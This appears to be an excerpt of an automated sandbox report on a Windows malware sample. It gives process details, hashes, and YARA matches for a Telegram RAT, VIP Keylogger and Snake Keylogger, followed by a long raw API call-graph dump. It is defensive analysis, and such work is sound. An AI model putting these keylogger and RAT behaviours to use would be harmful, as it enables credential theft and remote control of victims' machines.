• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 7
Start time: 19:27:55
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
Imagebase: 0xf40000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 6.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 58
execution_graph: [rendered call-graph node and edge data from the interactive viewer; not reproduced as text]
EncodePointer 101497->101500 101553 2d8864 61 API calls 2 library calls 101497->101553 101500->101495 101501 2d2d00 101501->101493 101501->101500 101554 2d3220 101502->101554 101506 2d9c1c 101505->101506 101507 2d9c2f EnterCriticalSection 101505->101507 101512 2d9c93 101506->101512 101507->101490 101509 2d9c22 101509->101507 101536 2d30b5 58 API calls 3 library calls 101509->101536 101513 2d9c9f __alloc_osfhnd 101512->101513 101514 2d9ca8 101513->101514 101515 2d9cc0 101513->101515 101537 2da16b 58 API calls 2 library calls 101514->101537 101523 2d9ce1 __alloc_osfhnd 101515->101523 101540 2d881d 58 API calls 2 library calls 101515->101540 101518 2d9cad 101538 2da1c8 58 API calls 6 library calls 101518->101538 101519 2d9cd5 101521 2d9cdc 101519->101521 101522 2d9ceb 101519->101522 101541 2d8b28 58 API calls __getptd_noexit 101521->101541 101526 2d9c0b __lock 58 API calls 101522->101526 101523->101509 101524 2d9cb4 101539 2d309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101524->101539 101528 2d9cf2 101526->101528 101530 2d9cff 101528->101530 101531 2d9d17 101528->101531 101542 2d9e2b InitializeCriticalSectionAndSpinCount 101530->101542 101543 2d2d55 101531->101543 101534 2d9d0b 101549 2d9d33 LeaveCriticalSection _doexit 101534->101549 101537->101518 101538->101524 101540->101519 101541->101523 101542->101534 101544 2d2d5e RtlFreeHeap 101543->101544 101545 2d2d87 __dosmaperr 101543->101545 101544->101545 101546 2d2d73 101544->101546 101545->101534 101550 2d8b28 58 API calls __getptd_noexit 101546->101550 101548 2d2d79 GetLastError 101548->101545 101549->101523 101550->101548 101551->101496 101552->101497 101553->101501 101557 2d9d75 LeaveCriticalSection 101554->101557 101556 2d2c87 101556->101487 101557->101556 101558 2b3633 101559 2b366a 101558->101559 101560 2b3688 101559->101560 101561 2b36e7 101559->101561 101599 2b36e5 101559->101599 101565 2b374b PostQuitMessage 101560->101565 101566 2b3695 101560->101566 101563 2ed0cc 101561->101563 
101564 2b36ed 101561->101564 101562 2b36ca DefWindowProcW 101592 2b36d8 101562->101592 101613 2c1070 10 API calls Mailbox 101563->101613 101567 2b36f2 101564->101567 101568 2b3715 SetTimer RegisterWindowMessageW 101564->101568 101565->101592 101570 2ed154 101566->101570 101571 2b36a0 101566->101571 101572 2ed06f 101567->101572 101573 2b36f9 KillTimer 101567->101573 101575 2b373e CreatePopupMenu 101568->101575 101568->101592 101629 312527 71 API calls _memset 101570->101629 101576 2b36a8 101571->101576 101577 2b3755 101571->101577 101583 2ed0a8 MoveWindow 101572->101583 101584 2ed074 101572->101584 101610 2b443a Shell_NotifyIconW _memset 101573->101610 101574 2ed0f3 101614 2c1093 331 API calls Mailbox 101574->101614 101575->101592 101581 2b36b3 101576->101581 101588 2ed139 101576->101588 101603 2b44a0 101577->101603 101589 2b36be 101581->101589 101590 2ed124 101581->101590 101583->101592 101585 2ed078 101584->101585 101586 2ed097 SetFocus 101584->101586 101585->101589 101593 2ed081 101585->101593 101586->101592 101587 2b370c 101611 2b3114 DeleteObject DestroyWindow Mailbox 101587->101611 101588->101562 101628 307c36 59 API calls Mailbox 101588->101628 101589->101562 101615 2b443a Shell_NotifyIconW _memset 101589->101615 101627 312d36 81 API calls _memset 101590->101627 101591 2ed166 101591->101562 101591->101592 101612 2c1070 10 API calls Mailbox 101593->101612 101598 2ed134 101598->101592 101599->101562 101601 2ed118 101616 2b434a 101601->101616 101604 2b4539 101603->101604 101605 2b44b7 _memset 101603->101605 101604->101592 101630 2b407c 101605->101630 101607 2b4522 KillTimer SetTimer 101607->101604 101608 2b44de 101608->101607 101609 2ed4ab Shell_NotifyIconW 101608->101609 101609->101607 101610->101587 101611->101592 101612->101592 101613->101574 101614->101589 101615->101601 101617 2b4375 _memset 101616->101617 101657 2b4182 101617->101657 101621 2b4430 Shell_NotifyIconW 101623 2b4422 101621->101623 101622 2b4414 Shell_NotifyIconW 101622->101623 101625 2b407c 61 
API calls 101623->101625 101624 2b43fa 101624->101621 101624->101622 101626 2b4429 101625->101626 101626->101599 101627->101598 101628->101599 101629->101591 101631 2b4098 101630->101631 101632 2b416f Mailbox 101630->101632 101652 2b7a16 101631->101652 101632->101608 101635 2ed3c8 LoadStringW 101639 2ed3e2 101635->101639 101636 2b40b3 101637 2b7bcc 59 API calls 101636->101637 101638 2b40c8 101637->101638 101638->101639 101640 2b40d9 101638->101640 101641 2b7b2e 59 API calls 101639->101641 101642 2b40e3 101640->101642 101643 2b4174 101640->101643 101646 2ed3ec 101641->101646 101644 2b7b2e 59 API calls 101642->101644 101645 2b8047 59 API calls 101643->101645 101648 2b40ed _memset _wcscpy 101644->101648 101645->101648 101647 2b7cab 59 API calls 101646->101647 101646->101648 101649 2ed40e 101647->101649 101650 2b4155 Shell_NotifyIconW 101648->101650 101651 2b7cab 59 API calls 101649->101651 101650->101632 101651->101648 101653 2d0db6 Mailbox 59 API calls 101652->101653 101654 2b7a3b 101653->101654 101655 2b8029 59 API calls 101654->101655 101656 2b40a6 101655->101656 101656->101635 101656->101636 101658 2ed423 101657->101658 101659 2b4196 101657->101659 101658->101659 101660 2ed42c DestroyIcon 101658->101660 101659->101624 101661 312f94 62 API calls _W_store_winword 101659->101661 101660->101659 101661->101624 101662 2efe27 101675 2cf944 101662->101675 101664 2efe3d 101665 2efebe 101664->101665 101666 2efe53 101664->101666 101684 2bfce0 101665->101684 101764 2b9e5d 60 API calls 101666->101764 101668 2efe92 101670 2f089c 101668->101670 101671 2efe9a 101668->101671 101766 319e4a 89 API calls 4 library calls 101670->101766 101765 31834f 59 API calls Mailbox 101671->101765 101674 2efeb2 Mailbox 101676 2cf950 101675->101676 101677 2cf962 101675->101677 101678 2b9d3c 60 API calls 101676->101678 101679 2cf968 101677->101679 101680 2cf991 101677->101680 101683 2cf95a 101678->101683 101681 2d0db6 Mailbox 59 API calls 101679->101681 101682 2b9d3c 60 API calls 101680->101682 
101681->101683 101682->101683 101683->101664 101767 2b8180 101684->101767 101686 2bfd3d 101687 2f472d 101686->101687 101733 2c06f6 101686->101733 101772 2bf234 101686->101772 101874 319e4a 89 API calls 4 library calls 101687->101874 101691 2f4742 101692 2bfe3e 101693 2f488d 101692->101693 101699 2bfe4c 101692->101699 101878 3066ec 59 API calls 2 library calls 101692->101878 101693->101691 101693->101699 101880 32a2d9 85 API calls Mailbox 101693->101880 101694 2c0517 101703 2d0db6 Mailbox 59 API calls 101694->101703 101696 2d0db6 59 API calls Mailbox 101726 2bfdd3 101696->101726 101698 2f47d7 101698->101691 101876 319e4a 89 API calls 4 library calls 101698->101876 101704 2f48f9 101699->101704 101751 2f4b53 101699->101751 101776 2b837c 101699->101776 101700 2f4848 101879 3060ef 59 API calls 2 library calls 101700->101879 101711 2c0545 _memmove 101703->101711 101712 2f4917 101704->101712 101882 2b85c0 101704->101882 101707 2f4755 101707->101698 101875 2bf6a3 331 API calls 101707->101875 101709 2f48b2 Mailbox 101709->101699 101881 3066ec 59 API calls 2 library calls 101709->101881 101718 2d0db6 Mailbox 59 API calls 101711->101718 101715 2f4928 101712->101715 101720 2b85c0 59 API calls 101712->101720 101713 2bfea4 101721 2f4ad6 101713->101721 101722 2bff32 101713->101722 101758 2c0179 Mailbox _memmove 101713->101758 101714 2f486b 101716 2b9ea0 331 API calls 101714->101716 101715->101758 101890 3060ab 59 API calls Mailbox 101715->101890 101716->101693 101762 2c0106 _memmove 101718->101762 101720->101715 101898 319ae7 60 API calls 101721->101898 101723 2d0db6 Mailbox 59 API calls 101722->101723 101728 2bff39 101723->101728 101726->101691 101726->101692 101726->101694 101726->101696 101726->101707 101726->101711 101727 2b9ea0 331 API calls 101726->101727 101739 2f480c 101726->101739 101727->101726 101728->101733 101783 2c09d0 101728->101783 101729 2f4a4d 101730 2b9ea0 331 API calls 101729->101730 101731 2f4a87 101730->101731 101731->101691 101893 2b84c0 101731->101893 
101873 319e4a 89 API calls 4 library calls 101733->101873 101735 2bffb2 101735->101711 101735->101733 101742 2bffe6 101735->101742 101877 319e4a 89 API calls 4 library calls 101739->101877 101740 2f4ab2 101897 319e4a 89 API calls 4 library calls 101740->101897 101746 2b8047 59 API calls 101742->101746 101749 2c0007 101742->101749 101744 2b9c90 Mailbox 59 API calls 101744->101762 101745 2b9d3c 60 API calls 101745->101758 101746->101749 101747 2c0398 101747->101674 101748 2d0db6 59 API calls Mailbox 101748->101758 101749->101733 101750 2f4b24 101749->101750 101754 2c004c 101749->101754 101752 2b9d3c 60 API calls 101750->101752 101751->101691 101899 319e4a 89 API calls 4 library calls 101751->101899 101752->101751 101753 2c00d8 101755 2b9d3c 60 API calls 101753->101755 101754->101733 101754->101751 101754->101753 101757 2c00eb 101755->101757 101756 2f4a1c 101760 2d0db6 Mailbox 59 API calls 101756->101760 101757->101733 101860 2b82df 101757->101860 101758->101729 101758->101733 101758->101740 101758->101745 101758->101747 101758->101748 101758->101756 101871 2b8740 68 API calls __cinit 101758->101871 101872 2b8660 68 API calls 101758->101872 101891 315937 68 API calls 101758->101891 101892 2b89b3 69 API calls Mailbox 101758->101892 101760->101729 101762->101744 101762->101758 101763 2c0162 101762->101763 101763->101674 101764->101668 101765->101674 101766->101674 101768 2b818f 101767->101768 101771 2b81aa 101767->101771 101769 2b7e4f 59 API calls 101768->101769 101770 2b8197 CharUpperBuffW 101769->101770 101770->101771 101771->101686 101773 2bf251 101772->101773 101774 2bf272 101773->101774 101900 319e4a 89 API calls 4 library calls 101773->101900 101774->101726 101777 2eedbd 101776->101777 101778 2b838d 101776->101778 101779 2d0db6 Mailbox 59 API calls 101778->101779 101780 2b8394 101779->101780 101781 2b83b5 101780->101781 101901 2b8634 59 API calls Mailbox 101780->101901 101781->101704 101781->101713 101784 2f4cc3 101783->101784 101795 2c09f5 101783->101795 101961 
319e4a 89 API calls 4 library calls 101784->101961 101786 2c0cfa 101786->101735 101788 2c0ee4 101788->101786 101790 2c0ef1 101788->101790 101959 2c1093 331 API calls Mailbox 101790->101959 101791 2c0a4b PeekMessageW 101824 2c0a05 Mailbox 101791->101824 101794 2c0ef8 LockWindowUpdate DestroyWindow GetMessageW 101794->101786 101797 2c0f2a 101794->101797 101795->101824 101962 2b9e5d 60 API calls 101795->101962 101963 306349 331 API calls 101795->101963 101796 2f4e81 Sleep 101796->101824 101800 2f5c58 TranslateMessage DispatchMessageW GetMessageW 101797->101800 101798 2c0ce4 101798->101786 101958 2c1070 10 API calls Mailbox 101798->101958 101800->101800 101801 2f5c88 101800->101801 101801->101786 101802 2c0ea5 TranslateMessage DispatchMessageW 101803 2c0e43 PeekMessageW 101802->101803 101803->101824 101804 2f4d50 TranslateAcceleratorW 101804->101803 101804->101824 101805 2b9e5d 60 API calls 101805->101824 101806 2c0d13 timeGetTime 101806->101824 101807 2f581f WaitForSingleObject 101813 2f583c GetExitCodeProcess CloseHandle 101807->101813 101807->101824 101809 2d0db6 59 API calls Mailbox 101809->101824 101810 2c0e5f Sleep 101834 2c0e70 Mailbox 101810->101834 101811 2b8047 59 API calls 101811->101824 101812 2b7667 59 API calls 101812->101834 101814 2c0f95 101813->101814 101814->101735 101815 2f5af8 Sleep 101815->101834 101817 2d049f timeGetTime 101817->101834 101819 2c0f4e timeGetTime 101960 2b9e5d 60 API calls 101819->101960 101822 2f5b8f GetExitCodeProcess 101828 2f5bbb CloseHandle 101822->101828 101829 2f5ba5 WaitForSingleObject 101822->101829 101823 2b9837 84 API calls 101823->101824 101824->101791 101824->101796 101824->101798 101824->101802 101824->101803 101824->101804 101824->101805 101824->101806 101824->101807 101824->101809 101824->101810 101824->101811 101824->101814 101824->101815 101824->101819 101824->101823 101824->101834 101840 2b9ea0 304 API calls 101824->101840 101843 2bfce0 304 API calls 101824->101843 101845 2b7de1 59 API calls 101824->101845 101848 
319e4a 89 API calls 101824->101848 101849 2b9c90 59 API calls Mailbox 101824->101849 101850 2b84c0 69 API calls 101824->101850 101851 2b82df 59 API calls 101824->101851 101852 30617e 59 API calls Mailbox 101824->101852 101853 2b89b3 69 API calls 101824->101853 101854 2f55d5 VariantClear 101824->101854 101855 2b8cd4 59 API calls Mailbox 101824->101855 101856 2f566b VariantClear 101824->101856 101857 2f5419 VariantClear 101824->101857 101858 306e8f 59 API calls 101824->101858 101859 2bb73c 304 API calls 101824->101859 101902 2be6a0 101824->101902 101933 2bf460 101824->101933 101952 2b31ce 101824->101952 101957 2be420 331 API calls 101824->101957 101964 336018 59 API calls 101824->101964 101965 319a15 59 API calls Mailbox 101824->101965 101966 30d4f2 59 API calls 101824->101966 101967 3060ef 59 API calls 2 library calls 101824->101967 101968 2b8401 59 API calls 101824->101968 101826 335f25 110 API calls 101826->101834 101827 2bb7dd 109 API calls 101827->101834 101828->101834 101829->101824 101829->101828 101831 2f5874 101831->101814 101832 2f5078 Sleep 101832->101824 101833 2f5c17 Sleep 101833->101824 101834->101812 101834->101814 101834->101817 101834->101822 101834->101824 101834->101826 101834->101827 101834->101831 101834->101832 101834->101833 101837 2b7de1 59 API calls 101834->101837 101969 312408 60 API calls 101834->101969 101970 2b9e5d 60 API calls 101834->101970 101971 2b89b3 69 API calls Mailbox 101834->101971 101972 2bb73c 331 API calls 101834->101972 101973 3064da 60 API calls 101834->101973 101974 315244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101834->101974 101975 313c55 66 API calls Mailbox 101834->101975 101837->101834 101840->101824 101843->101824 101845->101824 101848->101824 101849->101824 101850->101824 101851->101824 101852->101824 101853->101824 101854->101824 101855->101824 101856->101824 101857->101824 101858->101824 101859->101824 101861 2b82f2 101860->101861 101862 2eeda1 101860->101862 101863 
2b8339 Mailbox 101861->101863 101866 2b85c0 59 API calls 101861->101866 101867 2b831c 101861->101867 101864 2eedb1 101862->101864 103010 3061a4 59 API calls 101862->103010 101863->101762 101866->101867 101868 2b8322 101867->101868 101869 2b85c0 59 API calls 101867->101869 101868->101863 101870 2b9c90 Mailbox 59 API calls 101868->101870 101869->101868 101870->101863 101871->101758 101872->101758 101873->101687 101874->101691 101875->101698 101876->101691 101877->101691 101878->101700 101879->101714 101880->101709 101881->101709 101883 2b85ce 101882->101883 101889 2b85f6 101882->101889 101884 2b85dc 101883->101884 101885 2b85c0 59 API calls 101883->101885 101886 2b85e2 101884->101886 101887 2b85c0 59 API calls 101884->101887 101885->101884 101888 2b9c90 Mailbox 59 API calls 101886->101888 101886->101889 101887->101886 101888->101889 101889->101712 101890->101758 101891->101758 101892->101758 101894 2b84cb 101893->101894 101896 2b84f2 101894->101896 103011 2b89b3 69 API calls Mailbox 101894->103011 101896->101740 101897->101691 101898->101742 101899->101691 101900->101774 101901->101781 101903 2be6d5 101902->101903 101904 2be73f 101903->101904 101905 2f3aa9 101903->101905 101916 2be799 101903->101916 101910 2b7667 59 API calls 101904->101910 101904->101916 101906 2b9ea0 331 API calls 101905->101906 101907 2f3abe 101906->101907 101932 2be970 Mailbox 101907->101932 101977 319e4a 89 API calls 4 library calls 101907->101977 101908 2b7667 59 API calls 101908->101916 101911 2f3b04 101910->101911 101914 2d2d40 __cinit 67 API calls 101911->101914 101912 2d2d40 __cinit 67 API calls 101912->101916 101913 2f3b26 101913->101824 101914->101916 101915 2b84c0 69 API calls 101915->101932 101916->101908 101916->101912 101916->101913 101918 2be95a 101916->101918 101916->101932 101917 2b9ea0 331 API calls 101917->101932 101918->101932 101978 319e4a 89 API calls 4 library calls 101918->101978 101920 2b8d40 59 API calls 101920->101932 101921 2b9c90 Mailbox 59 API calls 101921->101932 
101924 319e4a 89 API calls 101924->101932 101929 2bf195 101982 319e4a 89 API calls 4 library calls 101929->101982 101930 2f3e25 101930->101824 101931 2bea78 101931->101824 101932->101915 101932->101917 101932->101920 101932->101921 101932->101924 101932->101929 101932->101931 101976 2b7f77 59 API calls 2 library calls 101932->101976 101979 306e8f 59 API calls 101932->101979 101980 32c5c3 331 API calls 101932->101980 101981 32b53c 331 API calls Mailbox 101932->101981 101983 3293c6 331 API calls Mailbox 101932->101983 101934 2bf4ba 101933->101934 101935 2bf650 101933->101935 101937 2f441e 101934->101937 101938 2bf4c6 101934->101938 101936 2b7de1 59 API calls 101935->101936 101944 2bf58c Mailbox 101936->101944 102083 32bc6b 331 API calls Mailbox 101937->102083 102082 2bf290 331 API calls 2 library calls 101938->102082 101941 2f442c 101945 2bf630 101941->101945 102084 319e4a 89 API calls 4 library calls 101941->102084 101943 2bf4fd 101943->101941 101943->101944 101943->101945 101984 313c37 101944->101984 101987 31cb7a 101944->101987 102067 32445a 101944->102067 102076 2b4e4a 101944->102076 101945->101824 101946 2b9c90 Mailbox 59 API calls 101947 2bf5e3 101946->101947 101947->101945 101947->101946 101953 2b3212 101952->101953 101956 2b31e0 101952->101956 101953->101824 101954 2b3205 IsDialogMessageW 101954->101953 101954->101956 101955 2ecf32 GetClassLongW 101955->101954 101955->101956 101956->101953 101956->101954 101956->101955 101957->101824 101958->101788 101959->101794 101960->101824 101961->101795 101962->101795 101963->101795 101964->101824 101965->101824 101966->101824 101967->101824 101968->101824 101969->101834 101970->101834 101971->101834 101972->101834 101973->101834 101974->101834 101975->101834 101976->101932 101977->101932 101978->101932 101979->101932 101980->101932 101981->101932 101982->101930 101983->101932 102085 31445a GetFileAttributesW 101984->102085 101988 2b7667 59 API calls 101987->101988 101989 31cbaf 101988->101989 101990 2b7667 59 API calls 
101989->101990 101991 31cbb8 101990->101991 101992 31cbcc 101991->101992 102276 2b9b3c 59 API calls 101991->102276 101994 2b9837 84 API calls 101992->101994 101995 31cbe9 101994->101995 101996 31cc0b 101995->101996 101997 31ccea 101995->101997 102003 31cd1a Mailbox 101995->102003 101999 2b9837 84 API calls 101996->101999 102089 2b4ddd 101997->102089 102001 31cc17 101999->102001 102002 2b8047 59 API calls 102001->102002 102008 31cc23 102002->102008 102003->101947 102004 2b4ddd 136 API calls 102006 31cd16 102004->102006 102005 2b7667 59 API calls 102007 31cd4b 102005->102007 102006->102003 102006->102005 102009 2b7667 59 API calls 102007->102009 102010 31cc37 102008->102010 102011 31cc69 102008->102011 102012 31cd54 102009->102012 102013 2b8047 59 API calls 102010->102013 102014 2b9837 84 API calls 102011->102014 102015 2b7667 59 API calls 102012->102015 102017 31cc47 102013->102017 102018 31cc76 102014->102018 102016 31cd5d 102015->102016 102019 2b7667 59 API calls 102016->102019 102020 2b7cab 59 API calls 102017->102020 102021 2b8047 59 API calls 102018->102021 102023 31cd66 102019->102023 102024 31cc51 102020->102024 102022 31cc82 102021->102022 102277 314a31 GetFileAttributesW 102022->102277 102026 2b9837 84 API calls 102023->102026 102027 2b9837 84 API calls 102024->102027 102029 31cd73 102026->102029 102030 31cc5d 102027->102030 102028 31cc8b 102031 31cc9e 102028->102031 102034 2b79f2 59 API calls 102028->102034 102113 2b459b 102029->102113 102033 2b7b2e 59 API calls 102030->102033 102036 2b9837 84 API calls 102031->102036 102042 31cca4 102031->102042 102033->102011 102034->102031 102035 31cd8e 102164 2b79f2 102035->102164 102038 31cccb 102036->102038 102278 3137ef 75 API calls Mailbox 102038->102278 102041 31cdd1 102043 2b8047 59 API calls 102041->102043 102042->102003 102045 31cddf 102043->102045 102044 2b79f2 59 API calls 102046 31cdae 102044->102046 102047 2b7b2e 59 API calls 102045->102047 102046->102041 102049 2b7bcc 59 API calls 102046->102049 102048 
31cded 102047->102048 102050 2b7b2e 59 API calls 102048->102050 102051 31cdc3 102049->102051 102052 31cdfb 102050->102052 102053 2b7bcc 59 API calls 102051->102053 102054 2b7b2e 59 API calls 102052->102054 102053->102041 102055 31ce09 102054->102055 102056 2b9837 84 API calls 102055->102056 102057 31ce15 102056->102057 102167 314071 102057->102167 102059 31ce26 102060 313c37 3 API calls 102059->102060 102061 31ce30 102060->102061 102062 2b9837 84 API calls 102061->102062 102066 31ce61 102061->102066 102063 31ce4e 102062->102063 102221 319155 102063->102221 102065 2b4e4a 84 API calls 102065->102003 102066->102065 102068 2b9837 84 API calls 102067->102068 102069 324494 102068->102069 102976 2b6240 102069->102976 102071 3244c9 102075 3244cd 102071->102075 103001 2b9a98 59 API calls Mailbox 102071->103001 102072 3244a4 102072->102071 102073 2b9ea0 331 API calls 102072->102073 102073->102071 102075->101947 102077 2b4e5b 102076->102077 102078 2b4e54 102076->102078 102080 2b4e7b FreeLibrary 102077->102080 102081 2b4e6a 102077->102081 102079 2d53a6 __fcloseall 83 API calls 102078->102079 102079->102077 102080->102081 102081->101947 102082->101943 102083->101941 102084->101945 102086 314475 FindFirstFileW 102085->102086 102087 313c3e 102085->102087 102086->102087 102088 31448a FindClose 102086->102088 102087->101947 102088->102087 102279 2b4bb5 102089->102279 102094 2b4e08 LoadLibraryExW 102289 2b4b6a 102094->102289 102095 2ed8e6 102096 2b4e4a 84 API calls 102095->102096 102098 2ed8ed 102096->102098 102100 2b4b6a 3 API calls 102098->102100 102102 2ed8f5 102100->102102 102315 2b4f0b 102102->102315 102103 2b4e2f 102103->102102 102104 2b4e3b 102103->102104 102105 2b4e4a 84 API calls 102104->102105 102107 2b4e40 102105->102107 102107->102004 102107->102006 102110 2ed91c 102323 2b4ec7 102110->102323 102114 2b7667 59 API calls 102113->102114 102115 2b45b1 102114->102115 102116 2b7667 59 API calls 102115->102116 102117 2b45b9 102116->102117 102118 2b7667 59 API calls 
102117->102118 102119 2b45c1 102118->102119 102120 2b7667 59 API calls 102119->102120 102121 2b45c9 102120->102121 102122 2b45fd 102121->102122 102123 2ed4d2 102121->102123 102124 2b784b 59 API calls 102122->102124 102125 2b8047 59 API calls 102123->102125 102126 2b460b 102124->102126 102127 2ed4db 102125->102127 102128 2b7d2c 59 API calls 102126->102128 102129 2b7d8c 59 API calls 102127->102129 102130 2b4615 102128->102130 102133 2b4640 102129->102133 102132 2b784b 59 API calls 102130->102132 102130->102133 102131 2b4680 102136 2b784b 59 API calls 102131->102136 102134 2b4636 102132->102134 102133->102131 102135 2b465f 102133->102135 102146 2ed4fb 102133->102146 102137 2b7d2c 59 API calls 102134->102137 102139 2b79f2 59 API calls 102135->102139 102140 2b4691 102136->102140 102137->102133 102138 2ed5cb 102141 2b7bcc 59 API calls 102138->102141 102142 2b4669 102139->102142 102143 2b46a3 102140->102143 102144 2b8047 59 API calls 102140->102144 102159 2ed588 102141->102159 102142->102131 102150 2b784b 59 API calls 102142->102150 102145 2b46b3 102143->102145 102147 2b8047 59 API calls 102143->102147 102144->102143 102149 2b46ba 102145->102149 102151 2b8047 59 API calls 102145->102151 102146->102138 102148 2ed5b4 102146->102148 102158 2ed532 102146->102158 102147->102145 102148->102138 102154 2ed59f 102148->102154 102152 2b8047 59 API calls 102149->102152 102161 2b46c1 Mailbox 102149->102161 102150->102131 102151->102149 102152->102161 102153 2b79f2 59 API calls 102153->102159 102157 2b7bcc 59 API calls 102154->102157 102155 2ed590 102156 2b7bcc 59 API calls 102155->102156 102156->102159 102157->102159 102158->102155 102162 2ed57b 102158->102162 102159->102131 102159->102153 102607 2b7924 59 API calls 2 library calls 102159->102607 102161->102035 102163 2b7bcc 59 API calls 102162->102163 102163->102159 102165 2b7e4f 59 API calls 102164->102165 102166 2b79fd 102165->102166 102166->102041 102166->102044 102168 31408d 102167->102168 102169 3140a0 102168->102169 102170 
314092 102168->102170 102172 2b7667 59 API calls 102169->102172 102171 2b8047 59 API calls 102170->102171 102220 31409b Mailbox 102171->102220 102173 3140a8 102172->102173 102174 2b7667 59 API calls 102173->102174 102175 3140b0 102174->102175 102176 2b7667 59 API calls 102175->102176 102177 3140bb 102176->102177 102178 2b7667 59 API calls 102177->102178 102179 3140c3 102178->102179 102180 2b7667 59 API calls 102179->102180 102181 3140cb 102180->102181 102182 2b7667 59 API calls 102181->102182 102183 3140d3 102182->102183 102184 2b7667 59 API calls 102183->102184 102185 3140db 102184->102185 102186 2b7667 59 API calls 102185->102186 102187 3140e3 102186->102187 102188 2b459b 59 API calls 102187->102188 102189 3140fa 102188->102189 102190 2b459b 59 API calls 102189->102190 102191 314113 102190->102191 102192 2b79f2 59 API calls 102191->102192 102193 31411f 102192->102193 102194 314132 102193->102194 102195 2b7d2c 59 API calls 102193->102195 102196 2b79f2 59 API calls 102194->102196 102195->102194 102197 31413b 102196->102197 102198 31414b 102197->102198 102199 2b7d2c 59 API calls 102197->102199 102200 2b8047 59 API calls 102198->102200 102199->102198 102201 314157 102200->102201 102202 2b7b2e 59 API calls 102201->102202 102203 314163 102202->102203 102608 314223 59 API calls 102203->102608 102205 314172 102609 314223 59 API calls 102205->102609 102207 314185 102208 2b79f2 59 API calls 102207->102208 102209 31418f 102208->102209 102210 314194 102209->102210 102211 3141a6 102209->102211 102212 2b7cab 59 API calls 102210->102212 102213 2b79f2 59 API calls 102211->102213 102214 3141a1 102212->102214 102215 3141af 102213->102215 102219 2b7b2e 59 API calls 102214->102219 102216 3141cd 102215->102216 102218 2b7cab 59 API calls 102215->102218 102217 2b7b2e 59 API calls 102216->102217 102217->102220 102218->102214 102219->102216 102220->102059 102222 319162 __write_nolock 102221->102222 102223 2d0db6 Mailbox 59 API calls 102222->102223 102224 3191bf 102223->102224 102225 
2b522e 59 API calls 102224->102225 102226 3191c9 102225->102226 102227 318f5f GetSystemTimeAsFileTime 102226->102227 102228 3191d4 102227->102228 102229 2b4ee5 85 API calls 102228->102229 102230 3191e7 _wcscmp 102229->102230 102231 3192b8 102230->102231 102232 31920b 102230->102232 102233 319734 96 API calls 102231->102233 102640 319734 102232->102640 102249 319284 _wcscat 102233->102249 102237 2b4f0b 74 API calls 102238 3192dd 102237->102238 102240 2b4f0b 74 API calls 102238->102240 102239 3192c1 102239->102066 102242 3192ed 102240->102242 102241 319239 _wcscat _wcscpy 102647 2d40fb 58 API calls __wsplitpath_helper 102241->102647 102243 2b4f0b 74 API calls 102242->102243 102245 319308 102243->102245 102246 2b4f0b 74 API calls 102245->102246 102247 319318 102246->102247 102248 2b4f0b 74 API calls 102247->102248 102250 319333 102248->102250 102249->102237 102249->102239 102251 2b4f0b 74 API calls 102250->102251 102252 319343 102251->102252 102253 2b4f0b 74 API calls 102252->102253 102254 319353 102253->102254 102255 2b4f0b 74 API calls 102254->102255 102256 319363 102255->102256 102610 3198e3 GetTempPathW GetTempFileNameW 102256->102610 102258 31936f 102259 2d525b 115 API calls 102258->102259 102269 319380 102259->102269 102260 31943a 102624 2d53a6 102260->102624 102262 319445 102264 31944b DeleteFileW 102262->102264 102265 31945f 102262->102265 102263 2b4f0b 74 API calls 102263->102269 102264->102239 102266 319505 CopyFileW 102265->102266 102271 319469 _wcsncpy 102265->102271 102267 31951b DeleteFileW 102266->102267 102268 31952d DeleteFileW 102266->102268 102267->102239 102637 3198a2 CreateFileW 102268->102637 102269->102239 102269->102260 102269->102263 102611 2d4863 102269->102611 102648 318b06 102271->102648 102275 3194f4 DeleteFileW 102275->102239 102276->101992 102277->102028 102278->102042 102328 2b4c03 102279->102328 102282 2b4bec FreeLibrary 102283 2b4bf5 102282->102283 102286 2d525b 102283->102286 102284 2b4c03 2 API calls 102285 2b4bdc 102284->102285 
102285->102282 102285->102283 102332 2d5270 102286->102332 102288 2b4dfc 102288->102094 102288->102095 102413 2b4c36 102289->102413 102292 2b4c36 2 API calls 102295 2b4b8f 102292->102295 102293 2b4baa 102296 2b4c70 102293->102296 102294 2b4ba1 FreeLibrary 102294->102293 102295->102293 102295->102294 102297 2d0db6 Mailbox 59 API calls 102296->102297 102298 2b4c85 102297->102298 102299 2b522e 59 API calls 102298->102299 102300 2b4c91 _memmove 102299->102300 102301 2b4ccc 102300->102301 102302 2b4d89 102300->102302 102303 2b4dc1 102300->102303 102304 2b4ec7 69 API calls 102301->102304 102417 2b4e89 CreateStreamOnHGlobal 102302->102417 102428 31991b 95 API calls 102303->102428 102312 2b4cd5 102304->102312 102307 2b4f0b 74 API calls 102307->102312 102308 2b4d69 102308->102103 102310 2ed8a7 102311 2b4ee5 85 API calls 102310->102311 102313 2ed8bb 102311->102313 102312->102307 102312->102308 102312->102310 102423 2b4ee5 102312->102423 102314 2b4f0b 74 API calls 102313->102314 102314->102308 102316 2ed9cd 102315->102316 102317 2b4f1d 102315->102317 102452 2d55e2 102317->102452 102320 319109 102584 318f5f 102320->102584 102322 31911f 102322->102110 102324 2b4ed6 102323->102324 